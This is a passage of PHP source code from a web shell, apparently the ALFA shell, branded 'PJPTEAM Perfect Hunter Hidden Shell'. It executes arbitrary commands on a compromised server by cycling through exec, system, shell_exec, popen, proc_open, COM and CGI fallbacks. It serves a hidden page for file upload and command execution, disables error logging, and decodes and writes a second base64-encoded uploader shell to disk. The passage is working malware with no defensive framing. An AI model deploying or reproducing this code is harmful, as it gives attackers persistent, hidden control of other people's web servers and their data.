  686. $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
  687. $post = new AlfaCURL();
  688. $data = $post->Send($address, "post", $cmd);
  689. }elseif($is_socket){
  690. $server = $_SERVER["SERVER_NAME"];
  691. $uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
  692. $data = _alfa_fsockopen($server,$uri,$cmd);
  693. }
  694. $out = "";
  695. if(strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]<pre>"+output+"</pre>') === false){
  696. if($set_cookie){
  697. __alfa_set_cookie("haxorcgiapi", $lang);
  698. }
  699. if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
  700. $out = $res[1];
  701. }
  702. }elseif($lang=="perl"){
  703. return _alfa_cgicmd($cmd_pure,"py",$set_cookie);
  704. }elseif($lang=="py"){
  705. return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);
  706. }elseif($lang=="bash" && $GLOBALS['sys']=="win"){
  707. return _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);
  708. }else{
  709. if($set_cookie){
  710. __alfa_set_cookie("haxorcgiapi_mode", "off");
  711. }
  712. }
  713. return trim($out);
  714. }else{
  715. return "";
  716. }
  717. }
  718. function alfaGetCwd(){
  719. if(function_exists("getcwd")){
  720. return @getcwd();
  721. }else{
  722. return dirname($_SERVER["SCRIPT_FILENAME"]);
  723. }
  724. }
  725. function alfaEx($in,$re=false,$cgi=true,$all=false){
  726. $data = _alfa_php_cmd($in,$re);
  727. if(empty($data)&&$cgi||$all){
  728. if($GLOBALS['sys']=='unix'){
  729. if(strlen(_alfa_php_cmd("whoami"))==0||$all){
  730. $cmd = _alfa_cgicmd($in);
  731. if(!empty($cmd)){
  732. return $cmd;
  733. }
  734. }
  735. }
  736. }
  737. return $data;
  738. }
  739. function _alfa_php_cmd($in,$re=false){
  740. $out='';
  741. try{
  742. if($re)$in=$in." 2>&1";
  743. if(function_exists('exec')){
  744. @exec($in,$out);
  745. $out = @join("\n",$out);
  746. }elseif(function_exists('passthru')) {
  747. ob_start();
  748. @passthru($in);
  749. $out = ob_get_clean();
  750. }elseif(function_exists('system')){
  751. ob_start();
  752. @system($in);
  753. $out = ob_get_clean();
  754. } elseif (function_exists('shell_exec')) {
  755. $out = shell_exec($in);
  756. }elseif(function_exists("popen")&&function_exists("pclose")){
  757. if(is_resource($f = @popen($in,"r"))){
  758. $out = "";
  759. while(!@feof($f))
  760. $out .= fread($f,1024);
  761. pclose($f);
  762. }
  763. }elseif(function_exists('proc_open')){
  764. $pipes = array();
  765. $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
  766. $out=@stream_get_contents($pipes[1]);
  767. }elseif(class_exists('COM')){
  768. $alfaWs = new COM('WScript.shell');
  769. $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
  770. $stdout = $exec->StdOut();
  771. $out=$stdout->ReadAll();
  772. }
  773. }catch(Exception $e){}
  774. return $out;
  775. }
  776. function _alfa_fsockopen($server,$uri,$post){
  777. $socket = @fsockopen($server, 80, $errno, $errstr, 15);
  778. if($socket){
  779. $http = "POST {$uri} HTTP/1.0\r\n";
  780. $http .= "Host: {$server}\r\n";
  781. $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
  782. $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
  783. $http .= "Content-length: " . strlen($post) . "\r\n";
  784. $http .= "Connection: close\r\n\r\n";
  785. $http .= $post . "\r\n\r\n";
  786. fwrite($socket, $http);
  787. $contents = "";
  788. while (!@feof($socket)) {
  789. $contents .= @fgets($socket, 4096);
  790. }
  791. list($header, $body) = explode("\r\n\r\n", $contents, 2);
  792. @fclose($socket);
  793. return $body;
  794. }else{
  795. return "";
  796. }
  797. }
  798. if(isset($_GET["solevisible"])){
  799. @error_reporting(E_ALL ^ E_NOTICE);
  800. echo '<html>';
  801. echo "<title>PJPTEAM Perfect Hunter Hidden Shell</title>";
  802. echo "<body bgcolor=#000000>";
  803. echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
  804. $safe_mode = @ini_get('safe_mode');
  805. if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
  806. echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
  807. echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
  808. echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
  809. echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@alfaGetCwd()) . "/<br />";
  810. echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
  811. echo"<font color=#7CFC00>Disable functions : </font>";
  812. $disfun = @ini_get('disable_functions');
  813. if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
  814. echo"<font color=red>";
  815. echo "$disfun";
  816. echo"</font><br>";
  817. echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
  818. echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
  819. echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  820. echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@alfaGetCwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
  821. if(isset($_FILES['file'])){
  822. if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
  823. else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
  824. }
  825. echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
  826. <hr><pre>';
  827. if(isset($_POST['command_solevisible'])){
  828. if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
  829. $solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
  830. echo alfaEx($solevisible);
  831. }
  832. echo'</pre>
  833. </body></html>';
  834. exit;}
  835. @error_reporting(E_ALL ^ E_NOTICE);
  836. @ini_set('error_log',NULL);
  837. @ini_set('log_errors',0);
  838. @ini_set('max_execution_time',0);
  839. @ini_set('magic_quotes_runtime', 0);
  840. @set_time_limit(0);
  841. if(function_exists('set_magic_quotes_runtime')){
  842. @set_magic_quotes_runtime(0);
  843. }
  844. foreach($_POST as $key => $value){
  845. if(is_array($_POST[$key])){
  846. $i=0;
  847. foreach($_POST[$key] as $f) {
  848. $f = trim(str_replace(' ', '+',$f));
  849. $_POST[$key][$i] = decrypt_post($f);
  850. $i++;
  851. }
  852. }else{
  853. $value = trim(str_replace(' ', '+',$value));
  854. $_POST[$key] = decrypt_post($value);
  855. }
  856. }
  857. $default_action = 'FilesMan2';
  858. $default_use_ajax = true;
  859. $default_charset = 'Windows-1251';
  860. if(strtolower(substr(PHP_OS,0,3))=="win")
  861. $GLOBALS['sys']='win';
  862. else
  863. $GLOBALS['sys']='unix';
  864. $GLOBALS['home_cwd'] = @alfaGetCwd();
  865. $GLOBALS["need_to_update_header"] = "false";
  866. $GLOBALS['glob_chdir_false'] = false;
  867. if(isset($_POST['c'])){
  868. if(!@chdir($_POST['c'])){
  869. $GLOBALS['glob_chdir_false'] = true;
  870. }
  871. }
  872. $GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());
  873. if($GLOBALS['glob_chdir_false']){
  874. $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
  875. }
  876. if($GLOBALS['sys'] == 'win'){
  877. $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
  878. $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
  879. }
  880. if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
  881. if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
  882. if(!function_exists("mb_strlen")){
  883. function mb_strlen($str, $c=""){
  884. return strlen($str);
  885. }
  886. }
  887. if(!function_exists("mb_substr")){
  888. function mb_substr($str, $start, $end, $c=""){
  889. return substr($str, $start, $end);
  890. }
  891. }
  892. define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
  893. function alfahead(){
  894. $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
  895. $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
  896. define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
  897. if(!isset($_POST['ajax'])){
  898. function Alfa_GetDisable_Function(){
  899. $disfun = @ini_get('disable_functions');
  900. $afa = '<span class="header_show_all">All Functions Accessible</span>';
  901. if(empty($disfun))return($afa);
  902. $s = explode(',',$disfun);
  903. $s = array_unique($s);
  904. $i=0;
  905. $b=0;
  906. $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
  907. $black_list = array();
  908. $allow_list = array();
  909. foreach($s as $d){
  910. $d=trim($d);
  911. if(empty($d)||!is_callable($d))continue;
  912. if(!function_exists($d)){
  913. if(in_array($d,$func)){
  914. $dis .= $d." | ";$b++;
  915. $black_list[] = $d;
  916. }else{
  917. $allow_list[] = $d;
  918. }
  919. $i++;
  920. }
  921. }
  922. if($i==0)return($afa);
  923. if($i <= count($func)){
  924. $all = array_values(array_merge($black_list, $allow_list));
  925. return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
  926. }
  927. return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
  928. }
  929. function AlfaNum(){
  930. $args = func_get_args();
  931. $alfax = array();
  932. $find = array();
  933. for($i=1;$i<=10;$i++){
  934. $alfax[] = $i;
  935. }
  936. foreach($args as $arg){
  937. $find[] = $arg;
  938. }
  939. echo '<script>';
  940. foreach($alfax as $alfa){
  941. if(in_array($alfa,$find))
  942. continue;
  943. echo 'alfa'.$alfa."_=";
  944. }
  945. echo '""</script>';
  946. }
  947. if(empty($_POST['charset']))
  948. $_POST['charset'] = $GLOBALS['default_charset'];
  949. $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
  950. $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
  951. $totalSpace = $totalSpace?$totalSpace:1;
  952. $on="<span class='header_on'> ON </span>";
  953. $of="<span class='header_off'> OFF </span>";
  954. $none="<span class='header_none'> NONE </span>";
  955. if(function_exists('ssh2_connect'))
  956. $ssh2=$on;
  957. else
  958. $ssh2=$of;
  959. if(function_exists('curl_version'))
  960. $curl=$on;
  961. else
  962. $curl=$of;
  963. if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
  964. $mysql=$on;
  965. else
  966. $mysql=$of;
  967. if(function_exists('mssql_connect'))
  968. $mssql=$on;
  969. else
  970. $mssql=$of;
  971. if(function_exists('pg_connect'))
  972. $pg=$on;
  973. else
  974. $pg=$of;
  975. if(function_exists('oci_connect'))
  976. $or=$on;
  977. else
  978. $or=$of;
  979. if(@ini_get('disable_functions'))
  980. $disfun=@ini_get('disable_functions');
  981. else
  982. $disfun="All Functions Enable";
  983. if(@ini_get('safe_mode'))
  984. $safe_modes="<span class='header_off'>ON</span>";
  985. else
  986. $safe_modes="<span class='header_on'>OFF</span>";
  987. $cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
  988. if(@ini_get('open_basedir')){
  989. $basedir_data = @ini_get('open_basedir');
  990. if(strlen($basedir_data)>120){
  991. $open_b=substr($basedir_data,0, 120)."...";
  992. }else{
  993. $open_b = $basedir_data;
  994. }
  995. }else{$open_b=$none;}
  996. if(@ini_get('safe_mode_exec_dir'))
  997. $safe_exe=@ini_get('safe_mode_exec_dir');
  998. else
  999. $safe_exe=$none;
  1000. if(@ini_get('safe_mode_include_dir'))
  1001. $safe_include=@ini_get('safe_mode_include_dir');
  1002. else
  1003. $safe_include=$none;
  1004. if(!function_exists('posix_getegid'))
  1005. {
  1006. $user = function_exists("get_current_user")?@get_current_user():"????";
  1007. $uid = function_exists("getmyuid")?@getmyuid():"????";
  1008. $gid = function_exists("getmygid")?@getmygid():"????";
  1009. $group = "?";
  1010. }else{
  1011. $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
  1012. $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
  1013. $user = $uid['name'];
  1014. $uid = $uid['uid'];
  1015. $group = $gid['name'];
  1016. $gid = $gid['gid'];
  1017. }
  1018. $cwd_links = '';
  1019. $path = explode("/", $GLOBALS['cwd']);
  1020. $n=count($path);
  1021. for($i=0; $i<$n-1; $i++) {
  1022. $cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
  1023. $cach_cwd_path = "";
  1024. for($j=0; $j<=$i; $j++){
  1025. $cwd_links .= $path[$j].'/';
  1026. $cach_cwd_path .= $path[$j].'/';
  1027. }
  1028. $cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
  1029. }
  1030. $drives = "";
  1031. foreach(range('a','z') as $drive)
  1032. if(@is_dir($drive.':\\'))
  1033. $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  1034. $csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
  1035. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  1036. <html xmlns="http://www.w3.org/1999/xhtml">
  1037. <head>
  1038. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  1039. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  1040. <link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
  1041. <title>..:: '.$_SERVER['HTTP_HOST'].' ~ PJPTEAM Perfect Hunter ::..</title>
  1042. <style type="text/css">';?>
  1043. .hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab 